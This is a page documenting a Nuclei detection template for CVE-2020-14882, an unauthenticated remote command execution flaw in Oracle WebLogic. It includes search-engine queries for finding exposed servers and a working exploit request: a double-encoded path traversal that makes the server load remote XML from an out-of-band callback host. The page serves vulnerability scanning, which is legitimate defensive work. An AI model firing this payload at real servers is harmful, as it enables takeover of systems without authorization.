Oracle Weblogic Server - Remote Command Execution
ID: CVE-2020-14882
Severity: critical
Author: dwisiswant0
Tags: cve2020,cve,oracle,rce,weblogic,oast,kev
Description
Section titled “Description”Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
YAML Source
Section titled “YAML Source”id: CVE-2020-14882
info: name: Oracle Weblogic Server - Remote Command Execution author: dwisiswant0 severity: critical description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application. remediation: | Apply the latest security patches provided by Oracle to fix the vulnerability. reference: - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - https://www.oracle.com/security-alerts/cpuoct2020.html - https://twitter.com/jas502n/status/1321416053050667009 - https://youtu.be/JFVDOIL0YtA - https://github.com/jas502n/CVE-2020-14882#eg - https://nvd.nist.gov/vuln/detail/CVE-2020-14882 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 epss-score: 0.9739 epss-percentile: 0.99906 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: weblogic_server shodan-query: - http.title:"oracle peoplesoft sign-in" - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,rce,weblogic,oast,kev
http: - method: GET path: - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"
matchers-condition: and matchers: - type: word part: header words: - "ADMINCONSOLESESSION"
- type: word part: interactsh_protocol words: - "http"# digest: 4b0a00483046022100a83468cbaf47608561f4e428830f727b068bef38d1ed581f581da05903d76008022100ae5fe45d2d4f5a00ec6bb0ac3950f6d63163c9a1c30f98a08591f84f2002644c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-14882.yaml"